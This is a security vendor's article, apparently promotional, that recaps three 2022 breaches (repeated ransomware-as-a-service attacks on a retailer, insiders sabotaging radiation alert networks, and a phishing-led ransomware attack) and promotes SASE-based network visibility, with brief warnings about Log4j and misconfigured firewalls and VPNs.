#1: 2 RaaS Attacks in 13 Months

Here are three of the worst breaches, attacker tactics and
techniques of 2022, and the security controls that can provide
effective, enterprise security protection for them.

#1: 2 RaaS Attacks in 13 Months

Ransomware as a service is a type of attack in which the
ransomware software and infrastructure are leased out to the
attackers. These ransomware services can be purchased on the dark
web from other threat actors and ransomware gangs. Common
purchasing plans include buying the entire tool, using the existing
infrastructure while paying per infection, or letting other
attackers perform the service while sharing revenue with them.

In this attack, the threat actor consists of one of the most
prevalent ransomware groups, specializing in access via third
parties, while the targeted company is a medium-sized retailer with
dozens of sites in the United States.

The threat actors used ransomware as a service to breach the
victim’s network. They were able to exploit third-party credentials
to gain initial access, progress laterally, and ransom the company,
all within mere minutes.

The swiftness of this attack was unusual. In most RaaS cases,
attackers usually stay in the networks for weeks and months before
demanding ransom. What is particularly interesting about this
attack is that the company was ransomed in minutes, with no need
for discovery or weeks of lateral movement.

A log investigation revealed that the attackers targeted servers
that did not exist in this system. As it turns out, the victim was
initially breached and ransomed 13 months before this second
ransomware attack. Subsequently, the first attacker group monetized
the first attack not only through the ransom they obtained, but
also by selling the company’s network information to the second
ransomware group.

In the 13 months between the two attacks, the victim changed its
network and removed servers, but the new attackers were not aware
of these architectural modifications. The scripts they developed
were designed for the previous network map. This also explains how
they were able to attack so quickly – they had plenty of
information about the network. The main lesson here is that
ransomware attacks can be repeated by different groups, especially
if the victim pays well.

“RaaS attacks such as this one are a good example of how full
visibility allows for early alerting. A global, converged, cloud-native SASE platform^[1] that supports all edges,
like Cato Networks provides complete network visibility into
network events that are invisible to other providers or may go
under the radar as benign events. And, being able to fully
contextualize the events allows for early detection and
remediation.

#2: The Critical Infrastructure Attack on Radiation Alert
Networks

Attacks on critical infrastructure are becoming more common and
more dangerous. Breaches of water supply plants, sewage systems and
other such infrastructures could put millions of residents at risk
of a human crisis. These infrastructures are also becoming more
vulnerable, and attack surface management tools for OSINT like
Shodan and Censys allow security teams to find such vulnerabilities
with ease.

In 2021, two hackers were suspected of targeting radiation alert
networks. Their attack relied on two insiders that worked for a
third party. These insiders disabled the radiation alert systems,
significantly debilitating their ability to monitor radiation
attacks. The attackers were then able to delete critical software
and disable radiation gauges (which is part of the infrastructure
itself).

“Unfortunately, scanning for vulnerable systems in critical
infrastructure is easier than ever. While many such organizations
have multiple layers of security, they are still using point
solutions to try and defend their infrastructure rather than one
system that can look holistically at the full attack lifecycle.
Breaches are never just a phishing problem, or a credentials
problem, or a vulnerable system problem – they are always a
combination of multiple compromises performed by the threat actor,”
said Etay Maor, Sr. Director of Security Strategy at Cato Networks^[2].

#3: The Three-Step Ransomware Attack That Started with
Phishing

The third attack is also a ransomware attack. This time, it
consisted of three steps:

1. Infiltration – The attacker was able to gain
access to the network through a phishing attack. The victim clicked
on a link that generated a connection to an external site, which
resulted in the download of the payload.

2. Network activity – In the second phase, the
attacker progressed laterally in the network for two weeks. During
this time, it collected admin passwords and used in-memory fileless
malware. Then on New Year’s Eve, it performed the encryption. This
date was chosen since it was (rightfully) assumed the security team
would be off on vacation.

3. Exfiltration – Finally, the attackers
uploaded the data out of the network.

In addition to these three main steps, additional sub-techniques
were employed during the attack and the victim’s point security
solutions were not able to block this attack.

“A multiple choke point approach, one that looks horizontally
(so to speak) at the attack rather than as a set of vertical,
disjointed issues, is the way to enhance detection, mitigation and
prevention of such threats. Opposed to popular belief, the attacker
needs to be right many times and the defenders only need to be
right just once. The underlying technologies to implement a
multiple choke point approach are full network visibility via a
cloud-native backbone, and a single pass security stack that’s
based on ZTNA^[3].” said Etay Maor, Sr.
Director of Security Strategy at Cato Networks.

How Do Security Point Solutions Stack Up?

It is common for security professionals to succumb to the
“single point of failure fallacy”. However, cyber-attacks are
sophisticated events that rarely involve just one tactic or
technique which is the cause of the breach. Therefore, an
all-encompassing outlook is required to successfully mitigate
cyber-attacks. Security point solutions are a solution for single
points of failure. These tools can identify risks, but they will
not connect the dots, which could and has led to a breach.

Here’s Watch Out for in the Coming Months

According to ongoing security research conducted by Cato
Networks Security Team, they have identified two additional
vulnerabilities and exploit attempts that they recommend including
in your upcoming security plans:

1. Log4j

While Log4j^[4]
made its debut as early as December of 2021, the noise its making
hasn’t died down. Log4j is still being used by attackers to exploit
systems, as not all organizations have been able to patch their
Log4j vulnerabilities or detect Log4j attacks, in what is known as
“virtual patching”. They recommend prioritizing Log4j
mitigation.

2. Misconfigured Firewalls and VPNs

Security solutions like firewalls and VPNs have become access
points for attackers. Patching them has become increasingly
difficult, especially in the era of architecture cloudification and
remote work. It is recommended to pay close attention to these
components as they are increasingly vulnerable.

How to Minimize Your Attack Surface and Gain Visibility into
the Network

To reduce the attack surface, security professionals need
visibility into their networks. Visibility relies on three
pillars:

• Actionable information – that can be used to mitigate
  attacks
• Reliable information – that minimizes the number of false
  positives
• Timely information – to ensure mitigation happens before the
  attack has an impact

Once an organization has complete visibility to the activity on
their network they can contextualize the data, decide whether the
activity witnessed should be allowed, denied, monitored, restricted
(or any other action) and then have the ability to enforce this
decision. All these elements must be applied to every entity, be it
a user, device, cloud app etc. All the time everywhere. That is
what SASE is all about.